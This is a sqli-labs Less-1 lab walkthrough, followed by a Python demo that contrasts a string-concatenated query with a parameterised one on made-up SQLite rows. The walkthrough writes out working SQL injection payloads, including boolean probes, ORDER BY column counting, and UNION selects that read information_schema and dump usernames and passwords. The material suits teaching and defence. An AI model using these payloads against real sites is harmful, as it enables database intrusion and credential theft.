sqli-labs Less-1

Goal: retrieve the complete list of usernames and passwords.

0x01 Finding the injection point

Payload:

Numeric-type injection payloads (no quote) produce no change in the page.

`--` acts as a comment and comments out the rest of the statement; `+` stands for a space (it URL-decodes to one).

http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' and 1= 1--+   -> normal page
http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' and 1= 2--+   -> error

So the id parameter is injectable.

0x02 Determining the number of columns

http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' order by 3 --+   -> normal page
http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' order by 4 --+   -> Unknown column '4' in 'order clause'

So the query returns 3 columns.

0x03 UNION-based injection

http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,3--+

The database name is found to be security -> list its tables:

http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

emails,referers,uagents,users

List the columns of the users table, then dump it:

http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+
http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(username,0x2b,password) from users --+

0x2b is the hex value of `+`; it separates the username from the password in the output.
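Added example, not part of the original writeup: the pattern Less-1 exposes is a request parameter pasted into `WHERE id='...'`. The block below rebuilds that pattern against a constructed in-memory SQLite table (a stand-in for the lab's MySQL `users` table; the rows are made up), places a parameterised query beside it, and replays the boolean, ORDER BY and UNION probes from the steps above through both. The function names, the `compare` helper and the sample rows are my own and do not come from sqli-labs.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the lab's `users` table; these rows are made up.
SAMPLE_USERS = [
    (1, "alice", "pw-alice"),
    (2, "bob", "pw-bob"),
    (3, "carol", "pw-carol"),
]


def make_db():
    """In-memory SQLite database standing in for the lab's MySQL `security` schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """Mirrors the Less-1 pattern: the id value is spliced into the SQL text inside
    single quotes, so a quote in the input closes the literal and everything after
    it is parsed as SQL (the trailing `--` then hides the original LIMIT clause)."""
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, raw_id):
    """Hardened form: the value is bound as a parameter and never becomes SQL text,
    so quotes, `--` comments, ORDER BY and UNION inside it are inert data."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (raw_id,)).fetchall()


def id_from_url(url):
    """Extract the `id` query value the way the lab's PHP receives it:
    URL-decoded, with `+` turned into a space."""
    query = url.split("?", 1)[1]
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "id":
            return unquote_plus(value)
    return None


def compare(url):
    """Run one request's id value through both lookups.

    Returns (vulnerable_result, parameterised_result); a database error on the
    vulnerable side (e.g. the ORDER BY 4 probe) is returned as an 'error: ...' string,
    which is exactly the signal the writeup's column-counting step relies on."""
    conn = make_db()
    raw_id = id_from_url(url)
    try:
        vuln = lookup_vulnerable(conn, raw_id)
    except sqlite3.Error as exc:
        vuln = "error: %s" % exc
    safe = lookup_parameterised(conn, raw_id)
    return vuln, safe


if __name__ == "__main__":
    base = "http://127.0.0.1/sqli-labs-master/Less-1/?id="
    probes = (
        "1",
        "1' and 1=1--+",
        "1' and 1=2--+",
        "1' order by 3--+",
        "1' order by 4--+",
        "-1' union select 1,2,3--+",
    )
    for payload in probes:
        print(repr(payload), compare(base + payload))
```

Running it shows the asymmetry a reviewer should look for: every probe other than a plain `1` returns nothing through the parameterised query, while the concatenated query answers the boolean probes differently, raises on `order by 4`, and echoes `1,2,3` for the UNION probe. The ORDER BY error text differs from MySQL's (`Unknown column '4' in 'order clause'`), but the presence of an error is what the column-counting step keys on.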
